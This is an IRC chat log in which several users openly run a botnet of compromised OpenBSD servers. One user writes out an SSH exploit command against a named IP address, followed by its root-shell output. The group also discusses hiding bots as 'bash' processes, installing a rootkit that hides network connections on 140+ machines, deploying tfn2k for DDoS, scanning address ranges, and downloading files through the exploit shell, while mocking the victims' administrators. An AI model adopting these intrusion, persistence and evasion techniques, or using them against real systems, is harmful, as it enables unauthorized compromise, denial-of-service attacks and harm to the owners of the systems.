:if i sending a file HJKSHE!~K1m@most.wanted.terrori.st :i think its beacouse HJKSHE!~K1m@most.wanted.terrori.st :there is no crc HJKSHE!~K1m@most.wanted.terrori.st :check MTrez!mtrez@theprojext.com :sec HJKSHE!~K1m@most.wanted.terrori.st :oki HJKSHE!~K1m@most.wanted.terrori.st :lol *-1* PAN 62.79.52.47 3882 15 MTrez!mtrez@theprojext.com :does it normally reply to pings? HJKSHE!~K1m@most.wanted.terrori.st :-1 ? HJKSHE!~K1m@most.wanted.terrori.st :not sure MTrez!mtrez@theprojext.com :all bots with -1 in the name MTrez!mtrez@theprojext.com :heh HJKSHE!~K1m@most.wanted.terrori.st :lol HJKSHE!~K1m@most.wanted.terrori.st ::) MTrez!mtrez@theprojext.com :dont use all the bots, im not sure which im logging into other boxes from MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :i dont feel like pinging out MTrez!mtrez@theprojext.com :;p HJKSHE!~K1m@most.wanted.terrori.st ::) HJKSHE!~K1m@most.wanted.terrori.st :ok MTrez!mtrez@theprojext.com :at what point does this many bots get silly? MTrez!mtrez@theprojext.com :heh HJKSHE!~K1m@most.wanted.terrori.st :lol HJKSHE!~K1m@most.wanted.terrori.st ::) MTrez!mtrez@theprojext.com :you know its sad when i start to thank god an exploit doesnt work MTrez!mtrez@theprojext.com :so i dont have to repeat the installation proccess HJKSHE!~K1m@most.wanted.terrori.st :lol HJKSHE!~K1m@most.wanted.terrori.st :hehe Ronn|e!ronnie@lostforever.org :GOBBLE ! MTrez!mtrez@theprojext.com :hahah HJKSHE!~K1m@most.wanted.terrori.st :did nor wrk HJKSHE!~K1m@most.wanted.terrori.st :did not wrk HJKSHE!~K1m@most.wanted.terrori.st :notthing happens MTrez!mtrez@theprojext.com :k MTrez!mtrez@theprojext.com :oh MTrez!mtrez@theprojext.com :i know MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :its PRIVMSG HJKSHE!~K1m@most.wanted.terrori.st :lol HJKSHE!~K1m@most.wanted.terrori.st :that worked MTrez!mtrez@theprojext.com :i forgot my irc protocl MTrez!mtrez@theprojext.com :protocol MTrez!mtrez@theprojext.com :im rusty MTrez!mtrez@theprojext.com :hehe MTrez!mtrez@theprojext.com :ello synth synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :OMFG synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :it got bigger synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :jeSus christ MTrez!mtrez@theprojext.com ::) synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION just got rock hard. synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :;P MTrez!mtrez@theprojext.com :hehe synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :i think i just orjamagazminined MTrez!mtrez@theprojext.com :;) Ronn|e!ronnie@lostforever.org :found a new one mtrez i think Ronn|e!ronnie@lostforever.org :found a new one mtrez i think Ronn|e!ronnie@lostforever.org :found a new one mtrez i think Ronn|e!ronnie@lostforever.org :found a new one mtrez i think Ronn|e!ronnie@lostforever.org :found a new one mtrez i think Ronn|e!ronnie@lostforever.org :with the weird comamnd line..: synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :HAHHHAH..: Ronn|e!ronnie@lostforever.org :working it out now synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :ronn|e the rewtmaster Ronn|e!ronnie@lostforever.org :lol synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :should be named TeleHACK HJKSHE!~K1m@most.wanted.terrori.st :lol MTrez!mtrez@theprojext.com :heheh MTrez!mtrez@theprojext.com :lets see if i can remember how to structure a ctcp code exo-21 IRC PRIVMSG :\0001CTCP PING\001 MTrez!mtrez@theprojext.com :woops MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :no target exo-21 IRC PRIVMSG MTrez :\0001CTCP PING\001 Ronn|e!ronnie@lostforever.org :*GOBBLE* !! Ronn|e!ronnie@lostforever.org :*GOBBLE* !! MTrez!mtrez@theprojext.com :woop Ronn|e!ronnie@lostforever.org :./ssh -l root 66.13.163.70 -M bsdauth -S skey -j 4096 -d 3050..: Ronn|e!ronnie@lostforever.org :[*] remote host supports ssh2 Ronn|e!ronnie@lostforever.org :[*] server_user: root:skey..: Ronn|e!ronnie@lostforever.org :[*] keyboard-interactive method available..: Ronn|e!ronnie@lostforever.org :[*] chunk_size: 4096 tcode_rep: 3050 scode_rep 60 Ronn|e!ronnie@lostforever.org :[*] mode: exploitation Ronn|e!ronnie@lostforever.org :*GOBBLE* Ronn|e!ronnie@lostforever.org :OpenBSD ibis 3.0 GENERIC#94 i386 HJKSHE!~K1m@most.wanted.terrori.st ::) Ronn|e!ronnie@lostforever.org :uid=0(root) gid=0(wheel) groups=0(wheel) MTrez!mtrez@theprojext.com :load er up MTrez!mtrez@theprojext.com :load er up MTrez!mtrez@theprojext.com :load er up MTrez!mtrez@theprojext.com :load er up MTrez!mtrez@theprojext.com :;p..: Ronn|e!ronnie@lostforever.org :save that command line mtrez..PING :irc.secsup.uu.net..: Ronn|e!ronnie@lostforever.org :yupe..: HJKSHE!~K1m@most.wanted.terrori.st :nice MTrez!mtrez@theprojext.com :yep, in database as root #145 MTrez!mtrez@theprojext.com :;p MTrez!mtrez@theprojext.com :cool, our 2nd bdsl line Ronn|e!ronnie@lostforever.org :is coming now Ronn|e!ronnie@lostforever.org :yay ! synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :HAHHA synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :i love that *GOBBLE* Ronn|e!ronnie@lostforever.org :*GOBBLE* ! synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :rewt 145 HAHAHHA synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :rewt 145 HAHAHHA MTrez!mtrez@theprojext.com :fuckin hell MTrez!mtrez@theprojext.com :i dont wanna read the irc rfc MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :how the hell are ctcps structured MTrez!mtrez@theprojext.com :i remember they were a notice i think Ronn|e!ronnie@lostforever.org :*GOBBLE* ! Ronn|e!ronnie@lostforever.org :hehehe synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :won;t ircop notice all the massive nicks? synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :teh exo ones? MTrez!mtrez@theprojext.com :yah... maybe MTrez!mtrez@theprojext.com :but we dont use that anymore MTrez!mtrez@theprojext.com :but we dont use that anymore MTrez!mtrez@theprojext.com :but we dont use that anymore MTrez!mtrez@theprojext.com :i got lazy to rename them..: MTrez!mtrez@theprojext.com :as they joined..: MTrez!mtrez@theprojext.com :lol synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :yea ok synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :better not too MTrez!mtrez@theprojext.com :if you wanna change em back to garble feel free MTrez!mtrez@theprojext.com :;p MTrez!mtrez@theprojext.com :im too lazy tho MTrez!mtrez@theprojext.com :heh HJKSHE!~K1m@most.wanted.terrori.st :lol synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :whats the command structure? Ronn|e!ronnie@lostforever.org :keep the most stable ones, that don't ping out Ronn|e!ronnie@lostforever.org :when packeting Ronn|e!ronnie@lostforever.org :with the exo names MTrez!mtrez@theprojext.com :use !botname nick newbotname Ronn|e!ronnie@lostforever.org :and the rest, as gibberish MTrez!mtrez@theprojext.com :er true MTrez!mtrez@theprojext.com :dont ever use !* nick though MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :youll make them nick colide each other MTrez!mtrez@theprojext.com :youll make them nick colide each other MTrez!mtrez@theprojext.com :youll make them nick colide each other MTrez!mtrez@theprojext.com :and they will all exist..: MTrez!mtrez@theprojext.com :exit* MTrez!mtrez@theprojext.com :hehe MTrez!mtrez@theprojext.com :replace botname you dolt MTrez!mtrez@theprojext.com :;p MTrez!mtrez@theprojext.com :its !<currentnick> NICK <new synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :christ MTrez!mtrez@theprojext.com :rofl synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :thats ghey synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :i give up MTrez!mtrez@theprojext.com :dude MTrez!mtrez@theprojext.com :okay MTrez!mtrez@theprojext.com :look n learn synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION cites too ghey command structure. synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION cites too ghey command structure. synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION cites too ghey command structure. HAVM NICK I-OWN..: HAVM!root@detroit1-177-139.biz.dsl.gtei.net NICK :I-OWN..: synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :ohhhh synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION instead of slaping his forhead slapz trez. synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :i just pulled a classic trez MTrez!mtrez@theprojext.com :hehe, oh yah, more baby synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :isn;t that right ronn\e MTrez!mtrez@theprojext.com :ive had enough rooting till tonight FKXW NICK I-OWN..: MTrez!mtrez@theprojext.com :im gonna have my hands full MTrez!mtrez@theprojext.com :installing that rootkit MTrez!mtrez@theprojext.com :on 140+ boxes MTrez!mtrez@theprojext.com :heh FKXW NICK U-ALL HJKSHE!~K1m@most.wanted.terrori.st :lol HJKSHE!~K1m@most.wanted.terrori.st :it takes days MTrez!mtrez@theprojext.com :jeh MTrez!mtrez@theprojext.com :jeh MTrez!mtrez@theprojext.com :heh..: MTrez!mtrez@theprojext.com :its a real pain in the arse..: synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :hehe whos opio?..: MTrez!mtrez@theprojext.com :just installing these bots MTrez!mtrez@theprojext.com :this many times MTrez!mtrez@theprojext.com :is a pain MTrez!mtrez@theprojext.com :an op in #mro MTrez!mtrez@theprojext.com :muh friend MTrez!mtrez@theprojext.com :im just terrorizing friends MTrez!mtrez@theprojext.com :hehe MTrez!mtrez@theprojext.com :why the fuck do more bots keep joining MTrez!mtrez@theprojext.com :im not starting more MTrez!mtrez@theprojext.com :im not starting more MTrez!mtrez@theprojext.com :omg synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :AHAHAHAHH MTrez!mtrez@theprojext.com :theres like 293487293847 clones MTrez!mtrez@theprojext.com :on sc-66-75-96-192.socal.rr.com MTrez!mtrez@theprojext.com :the admin must by typing bash MTrez!mtrez@theprojext.com :like a moron MTrez!mtrez@theprojext.com :trying to figure out what it is HJKSHE!~K1m@most.wanted.terrori.st :hehe HJKSHE!~K1m@most.wanted.terrori.st :LOL HJKSHE!~K1m@most.wanted.terrori.st :what an idiot synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :what does it show up in command line as? synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :what does it show up in command line as? MTrez!mtrez@theprojext.com :you type "bash " MTrez!mtrez@theprojext.com :in /bin MTrez!mtrez@theprojext.com :and the bot starts up MTrez!mtrez@theprojext.com :and says nothing MTrez!mtrez@theprojext.com :heh Ronn|e!ronnie@lostforever.org :*GOBBLE* ! synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :HAHHHAHA Ronn|e!ronnie@lostforever.org :mtrez, ther'es no love bot installed there MTrez!mtrez@theprojext.com :where? Ronn|e!ronnie@lostforever.org :66.13.163.70 synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :u are prv msging people with whole net? MTrez!mtrez@theprojext.com :hrm Ronn|e!ronnie@lostforever.org :i mean, its on the list Ronn|e!ronnie@lostforever.org :but there's no bot Ronn|e!ronnie@lostforever.org :lemme do ps MTrez!mtrez@theprojext.com :install one MTrez!mtrez@theprojext.com :maybe i fucked it up MTrez!mtrez@theprojext.com :maybe i fucked it up MTrez!mtrez@theprojext.com :maybe i fucked it up MTrez!mtrez@theprojext.com :maybe i fucked it up MTrez!mtrez@theprojext.com :heh..: MTrez!mtrez@theprojext.com :synthBBL.:. yessir Ronn|e!ronnie@lostforever.org :ya, its not running..: synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :won;t u get caught then? Ronn|e!ronnie@lostforever.org :okay MTrez!mtrez@theprojext.com :just ppl i know, after i mmsged one dude, he asked me to mmsg another dude, then he asked etc MTrez!mtrez@theprojext.com :heheh MTrez!mtrez@theprojext.com :im a lover not a fighter ;p MTrez!mtrez@theprojext.com :nah MTrez!mtrez@theprojext.com :its all ppl that wont tell MTrez!mtrez@theprojext.com :heh synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :too many people will know MTrez!mtrez@theprojext.com :is all good, ill have the boxes patched and backdoored MTrez!mtrez@theprojext.com :by tonight MTrez!mtrez@theprojext.com :and they wont be on irc i dont think MTrez!mtrez@theprojext.com :gonna install tfn2k PMTW!~IXAXY@sc-66-75-96-192.socal.rr.com JOIN :#exo..: MTrez!mtrez@theprojext.com :this was just a temp solution, i didnt realize how much of a pain this many kaitens are MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :jesus fucking chris synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :hehehe MTrez!mtrez@theprojext.com :stupid ass cable admin MTrez!mtrez@theprojext.com :wont stop loading clones MTrez!mtrez@theprojext.com :i need to login and boot his ass synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :that guy keeps typing bash synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :HAHAHHA HJKSHE!~K1m@most.wanted.terrori.st :lol synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :wtf why even type bash synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :wtf why even type bash MTrez!mtrez@theprojext.com :to figure out why theres 2934872937 bash's running on his system MTrez!mtrez@theprojext.com :heh synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :hehe synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :he is just loading up more and more HJKSHE!~K1m@most.wanted.terrori.st :lol MTrez!mtrez@theprojext.com :*GOBBLE* MTrez!mtrez@theprojext.com :OpenBSD ns 3.0 GENERIC#94 i386..: MTrez!mtrez@theprojext.com :uid=0(root) gid=0(wheel) groups=0(wheel)..: MTrez!mtrez@theprojext.com :who..: MTrez!mtrez@theprojext.com :adeponte ttyp0 Aug 5 17:39 (redtux.cyph.org) MTrez!mtrez@theprojext.com :oh my GOD MTrez!mtrez@theprojext.com :its running like 293847293847 times HJKSHE!~K1m@most.wanted.terrori.st :i cant stop loughting Ronn|e!ronnie@lostforever.org :i tihnk i know why mtrez, the ftp thingie is bugged Ronn|e!ronnie@lostforever.org :i tihnk i know why mtrez, the ftp thingie is bugged synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :hahahha HJKSHE!~K1m@most.wanted.terrori.st :what an idiot admin MTrez!mtrez@theprojext.com :Ronn|e.:. yah, some boxes i have root on MTrez!mtrez@theprojext.com :i cant dl via ftp MTrez!mtrez@theprojext.com :so i just write down the root MTrez!mtrez@theprojext.com :ill work on those later Ronn|e!ronnie@lostforever.org :yup cool MTrez!mtrez@theprojext.com :ps aux | grep bash | wc -l..: MTrez!mtrez@theprojext.com :15 MTrez!mtrez@theprojext.com :fuckin 15 clones MTrez!mtrez@theprojext.com :what a retard MTrez!mtrez@theprojext.com :killall..: MTrez!mtrez@theprojext.com ://bin/sh: <stdin>[7]: killall: not found MTrez!mtrez@theprojext.com :omg MTrez!mtrez@theprojext.com :no killall MTrez!mtrez@theprojext.com :i dont wanna type this many pids :( MTrez!mtrez@theprojext.com :omg MTrez!mtrez@theprojext.com :they wont stop coming MTrez!mtrez@theprojext.com :omg MTrez!mtrez@theprojext.com :stop MTrez!mtrez@theprojext.com :please MTrez!mtrez@theprojext.com :wtf..: scripted!rezzie@207.104.94.181 KICK #exo UTMRCXCL :banned: join flood..: MTrez!mtrez@theprojext.com :heh..: scripted!rezzie@207.104.94.181 KICK #exo BWLEZSJ :banned: join flood..: MTrez!mtrez@theprojext.com :jesus no..: scripted!rezzie@207.104.94.181 KICK #exo GDKBIT :banned: join flood..: scripted!rezzie@207.104.94.181 KICK #exo YRUXOF :banned: join flood..: scripted!rezzie@207.104.94.181 KICK #exo CTAPIDS :banned: join flood MTrez!mtrez@theprojext.com :omg look at all those clones..: scripted!rezzie@207.104.94.181 KICK #exo GJOLKTI :banned: join flood MTrez!mtrez@theprojext.com :when you dont want them MTrez!mtrez@theprojext.com :efnet allows them MTrez!mtrez@theprojext.com :when u do MTrez!mtrez@theprojext.com :they dont MTrez!mtrez@theprojext.com :good MTrez!mtrez@theprojext.com :theyre all gone MTrez!mtrez@theprojext.com :heh Ronn|e!ronnie@lostforever.org :*GOBBLE* MTrez!mtrez@theprojext.com :woot MTrez!mtrez@theprojext.com :hrm MTrez!mtrez@theprojext.com :i think i did that already MTrez!mtrez@theprojext.com :ehheh MTrez!mtrez@theprojext.com :oh no MTrez!mtrez@theprojext.com :you installed to /bin on that box? MTrez!mtrez@theprojext.com :heheh MTrez!mtrez@theprojext.com :thats the one i had to kill it on MTrez!mtrez@theprojext.com :is cause i always add host first Ronn|e!ronnie@lostforever.org :oops MTrez!mtrez@theprojext.com ::-/ Ronn|e!ronnie@lostforever.org :ouch onn|e!ronnie@lostforever.org :lemme kill it MTrez!mtrez@theprojext.com :heheh Ronn|e!ronnie@lostforever.org :there're two processes running already Ronn|e!ronnie@lostforever.org :there're two processes running already Ronn|e!ronnie@lostforever.org :lol..: Ronn|e!ronnie@lostforever.org :what a dumbass MTrez!mtrez@theprojext.com :lol MTrez!mtrez@theprojext.com :here comes the clones MTrez!mtrez@theprojext.com :it starts itself somehow MTrez!mtrez@theprojext.com :dunno how MTrez!mtrez@theprojext.com :but it never stops MTrez!mtrez@theprojext.com :lol Ronn|e!ronnie@lostforever.org :root 28270 0.0 0.2 68 476 ?? S 7:48AM 0:00.00 -bash (bash )..: Ronn|e!ronnie@lostforever.org :root 26725 0.0 0.2 68 476 ?? S 7:48AM 0:00.00 -bash (bash ) Ronn|e!ronnie@lostforever.org :HAHAHAAHAH Ronn|e!ronnie@lostforever.org :again Ronn|e!ronnie@lostforever.org :i killed the file first Ronn|e!ronnie@lostforever.org :what a dumbass MTrez!mtrez@theprojext.com :yah MTrez!mtrez@theprojext.com :i had to fight that too MTrez!mtrez@theprojext.com :hehe MTrez!mtrez@theprojext.com :its retarded MTrez!mtrez@theprojext.com :heheh MTrez!mtrez@theprojext.com :lol Ronn|e!ronnie@lostforever.org :god what a dumbass Ronn|e!ronnie@lostforever.org :he started a shitload of them Ronn|e!ronnie@lostforever.org :he started a shitload of them Ronn|e!ronnie@lostforever.org :he started a shitload of them Ronn|e!ronnie@lostforever.org :lol..: PKBW!EHYZKBW@sc-66-75-96-192.socal.rr.com JOIN :#exo..: MTrez!mtrez@theprojext.com :ehhhe..: MTrez!mtrez@theprojext.com :here comes more MTrez!mtrez@theprojext.com :delete /bin/bash Ronn|e!ronnie@lostforever.org :i did alreayd Ronn|e!ronnie@lostforever.org :i don't know how they keep on coming MTrez!mtrez@theprojext.com :lol MTrez!mtrez@theprojext.com :try deleting /sbin/bash MTrez!mtrez@theprojext.com :i installed it there as well MTrez!mtrez@theprojext.com :i guess i need to install it somewhere uncommon MTrez!mtrez@theprojext.com :i guess i need to install it somewhere uncommon Ronn|e!ronnie@lostforever.org :its me doing kill -9..: Ronn|e!ronnie@lostforever.org :now killing them Ronn|e!ronnie@lostforever.org :but they kept on coming MTrez!mtrez@theprojext.com :yah Ronn|e!ronnie@lostforever.org :lol MTrez!mtrez@theprojext.com :delete the bot from /sbin first MTrez!mtrez@theprojext.com :heheh Ronn|e!ronnie@lostforever.org :and the file is gone MTrez!mtrez@theprojext.com :then maybe install it into a lib dir MTrez!mtrez@theprojext.com :like /usr/share MTrez!mtrez@theprojext.com :or something Ronn|e!ronnie@lostforever.org :done Ronn|e!ronnie@lostforever.org :what a dumbass Ronn|e!ronnie@lostforever.org :lemme kill those processes Ronn|e!ronnie@lostforever.org :lol MTrez!mtrez@theprojext.com :ps aux | grep bash MTrez!mtrez@theprojext.com :ps aux | grep bash MTrez!mtrez@theprojext.com :heheh..: MTrez!mtrez@theprojext.com :easy way to get the pids..: MTrez!mtrez@theprojext.com :;p..: QPGXU!~IPUHMHE@sc-66-75-96-192.socal.rr.com QUIT :Remote host closed the connection Ronn|e!ronnie@lostforever.org :all gone MTrez!mtrez@theprojext.com :lemme rewrite scripted to check no matter which way you add the host, (ip,host) or (host,ip) MTrez!mtrez@theprojext.com :cool Ronn|e!ronnie@lostforever.org :that's the one hidden MTrez!mtrez@theprojext.com :okay MTrez!mtrez@theprojext.com :oh my GOD..: MTrez!mtrez@theprojext.com :rofl MTrez!mtrez@theprojext.com :okay Ronn|e!ronnie@lostforever.org :my fucking god..: MTrez!mtrez@theprojext.com :idea MTrez!mtrez@theprojext.com :run it MTrez!mtrez@theprojext.com :then delete it MTrez!mtrez@theprojext.com :hahah Ronn|e!ronnie@lostforever.org :done MTrez!mtrez@theprojext.com :cool MTrez!mtrez@theprojext.com :what a retarded box MTrez!mtrez@theprojext.com :hehehe Ronn|e!ronnie@lostforever.org :mtrez Ronn|e!ronnie@lostforever.org :how i can download a file from the web Ronn|e!ronnie@lostforever.org :fast Ronn|e!ronnie@lostforever.org :with lynx ? MTrez!mtrez@theprojext.com :er, with the ssh exploit there is no easy way MTrez!mtrez@theprojext.com :you need to do it blindly MTrez!mtrez@theprojext.com :first MTrez!mtrez@theprojext.com :type lynx http://url MTrez!mtrez@theprojext.com :then press ctrl+d MTrez!mtrez@theprojext.com :then enter MTrez!mtrez@theprojext.com :and wait MTrez!mtrez@theprojext.com :a screen should appear in a few moments MTrez!mtrez@theprojext.com :press enter again MTrez!mtrez@theprojext.com :press enter again MTrez!mtrez@theprojext.com :then press y MTrez!mtrez@theprojext.com :enter MTrez!mtrez@theprojext.com :q MTrez!mtrez@theprojext.com :enter MTrez!mtrez@theprojext.com :;p MTrez!mtrez@theprojext.com :or something like that MTrez!mtrez@theprojext.com :heeh Ronn|e!ronnie@lostforever.org :there goes MTrez!mtrez@theprojext.com :its a bitch not having a real terminal MTrez!mtrez@theprojext.com :heheh Ronn|e!ronnie@lostforever.org :its already added on the list though Ronn|e!ronnie@lostforever.org :*GOBBLE!* Ronn|e!ronnie@lostforever.org :haha MTrez!mtrez@theprojext.com :woot MTrez!mtrez@theprojext.com :hehe Ronn|e!ronnie@lostforever.org :though it was that old one Ronn|e!ronnie@lostforever.org :that had the ftp broke Ronn|e!ronnie@lostforever.org :coz this one had it too MTrez!mtrez@theprojext.com :lol MTrez!mtrez@theprojext.com :slide msged me just now MTrez!mtrez@theprojext.com :about ghettobox MTrez!mtrez@theprojext.com :ronnie MTrez!mtrez@theprojext.com :heheh MTrez!mtrez@theprojext.com :says he might be able to get the acct back Ronn|e!ronnie@lostforever.org :*GOBBLE* Ronn|e!ronnie@lostforever.org :lol Ronn|e!ronnie@lostforever.org :lol Ronn|e!ronnie@lostforever.org :lol Ronn|e!ronnie@lostforever.org :lol Ronn|e!ronnie@lostforever.org :hahaha..: Ronn|e!ronnie@lostforever.org :that was crazy yesterday..: Ronn|e!ronnie@lostforever.org :he was really histery..: Ronn|e!ronnie@lostforever.org :histeric MTrez!mtrez@theprojext.com :heheh MTrez!mtrez@theprojext.com :yah MTrez!mtrez@theprojext.com :he requested a talk like 10 times MTrez!mtrez@theprojext.com :hehe Ronn|e!ronnie@lostforever.org :i though at first, was the admin on one of the hacked boxes Ronn|e!ronnie@lostforever.org :so Ronn|e!ronnie@lostforever.org :i did CTRL+C Ronn|e!ronnie@lostforever.org :lol Ronn|e!ronnie@lostforever.org :but the msgs continues Ronn|e!ronnie@lostforever.org :then i realized Ronn|e!ronnie@lostforever.org :HAHAHAHAAH MTrez!mtrez@theprojext.com :hahahahh MTrez!mtrez@theprojext.com :yah MTrez!mtrez@theprojext.com :he probably noticed the commands MTrez!mtrez@theprojext.com :with -l root in them MTrez!mtrez@theprojext.com :heheh MTrez!mtrez@theprojext.com :and knew something was up Ronn|e!ronnie@lostforever.org :this is weird Ronn|e!ronnie@lostforever.org :the bot came with a different ip Ronn|e!ronnie@lostforever.org :oh no Ronn|e!ronnie@lostforever.org :lol MTrez!mtrez@theprojext.com :odd MTrez!mtrez@theprojext.com :ehehhe Ronn|e!ronnie@lostforever.org :was another thing Ronn|e!ronnie@lostforever.org :there we go Ronn|e!ronnie@lostforever.org :hahahaah MTrez!mtrez@theprojext.com :maybe i should setup a irc server somewhere MTrez!mtrez@theprojext.com :with a timeout of 1200 seconds MTrez!mtrez@theprojext.com :with a timeout of 1200 seconds MTrez!mtrez@theprojext.com :with a timeout of 1200 seconds MTrez!mtrez@theprojext.com :with a timeout of 1200 seconds MTrez!mtrez@theprojext.com :that way the dos bots wont ping out MTrez!mtrez@theprojext.com :whenever u ddos from them MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :blah too much work MTrez!mtrez@theprojext.com :;p synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :heheh MTrez!mtrez@theprojext.com :just because i dunno which of u have flood protection MTrez!mtrez@theprojext.com :gonna see somethin MTrez!mtrez@theprojext.com :;p MTrez!mtrez@theprojext.com :awesome synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION just puked. MTrez!mtrez@theprojext.com :;) Ronn|e!ronnie@lostforever.org :lololol synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :MY EYES ARE BURNING MTrez!mtrez@theprojext.com :lol synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :my mirc cannot even handle scrolling that shit MTrez!mtrez@theprojext.com :lol MTrez!mtrez@theprojext.com :ehhe MTrez!mtrez@theprojext.com :some warez kid MTrez!mtrez@theprojext.com :from israel MTrez!mtrez@theprojext.com :came to la MTrez!mtrez@theprojext.com :i think he wants to hang out MTrez!mtrez@theprojext.com :i dunt even know him all that well MTrez!mtrez@theprojext.com :heh synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :tell him fuck off MTrez!mtrez@theprojext.com :ehheh synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :or u will dos him irl style MTrez!mtrez@theprojext.com :lol synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :israel is fucked anyways MTrez!mtrez@theprojext.com :hahah MTrez!mtrez@theprojext.com :yeh, hes an okay kid tho, he says hes gonna meet muh other friend MTrez!mtrez@theprojext.com :not into warez MTrez!mtrez@theprojext.com :just a crazy ass fbsd geek MTrez!mtrez@theprojext.com :my favourite azian nerd MTrez!mtrez@theprojext.com :;p MTrez!mtrez@theprojext.com :funny, talkin to my friend who wrote the openbsd rootkit MTrez!mtrez@theprojext.com :he said there is one bug MTrez!mtrez@theprojext.com :netstat shows .nothing. MTrez!mtrez@theprojext.com :rofl synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :HAHAH MTrez!mtrez@theprojext.com :he hacked it to try and hide his connections synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :that is not a bug MTrez!mtrez@theprojext.com :and he removed * MTrez!mtrez@theprojext.com :he asks me MTrez!mtrez@theprojext.com :so do you want me to leave that in MTrez!mtrez@theprojext.com :or show all connections MTrez!mtrez@theprojext.com :im like MTrez!mtrez@theprojext.com :wtf do you think? MTrez!mtrez@theprojext.com :hide it all! MTrez!mtrez@theprojext.com :heheh synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :show nothing synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :hide it all MTrez!mtrez@theprojext.com :yeh MTrez!mtrez@theprojext.com :thats gonna be leet tho MTrez!mtrez@theprojext.com :cause like MTrez!mtrez@theprojext.com :once i install the kit MTrez!mtrez@theprojext.com :all these boxes MTrez!mtrez@theprojext.com :are bottable MTrez!mtrez@theprojext.com :and anything-able MTrez!mtrez@theprojext.com :heheh synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :heheh Joar!~toxica@grendel.csc.smith.edu :holy jesus MTrez!mtrez@theprojext.com :hello Joar Joar!~toxica@grendel.csc.smith.edu :Hi MTrez synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :hahah Joar!~toxica@grendel.csc.smith.edu :I see the net is growing =) synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :when i first saw this my heart nearly exploded MTrez!mtrez@theprojext.com :ehhe of course synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :insane Joar!~toxica@grendel.csc.smith.edu :my god.. Irc-mafia should phear this enormous killer net Joar!~toxica@grendel.csc.smith.edu :=) MTrez!mtrez@theprojext.com :;p MTrez!mtrez@theprojext.com :i will get many many more MTrez!mtrez@theprojext.com :ive only scanned about 5 a classes Joar!~toxica@grendel.csc.smith.edu ::) Joar!~toxica@grendel.csc.smith.edu :hehe synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :hahahha MTrez!mtrez@theprojext.com :im just waiting for the rootkit MTrez!mtrez@theprojext.com :so i dont have to go back MTrez!mtrez@theprojext.com :and install over all the boxes MTrez!mtrez@theprojext.com :just gonna do these then start installing rootkit from the begining MTrez!mtrez@theprojext.com :ont he rest synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :ok bbl gonna go watch tv MTrez!mtrez@theprojext.com :cya Joar!~toxica@grendel.csc.smith.edu :what rootkit are you waiting for? synthBBL!sinix@doesnt.care.about.your.personal-opinions.net :ronn|e keep working u lazy baitch ;P MTrez!mtrez@theprojext.com :my friends openbsd rootkit Ronn|e!ronnie@lostforever.org :*gobble* ! Ronn|e!ronnie@lostforever.org :*gobble* ! Joar!~toxica@grendel.csc.smith.edu :k MTrez!mtrez@theprojext.com :woot Ronn|e!ronnie@lostforever.org :lol MTrez!mtrez@theprojext.com :ronnie is doing all the hard ones tho MTrez!mtrez@theprojext.com :haha MTrez!mtrez@theprojext.com :i 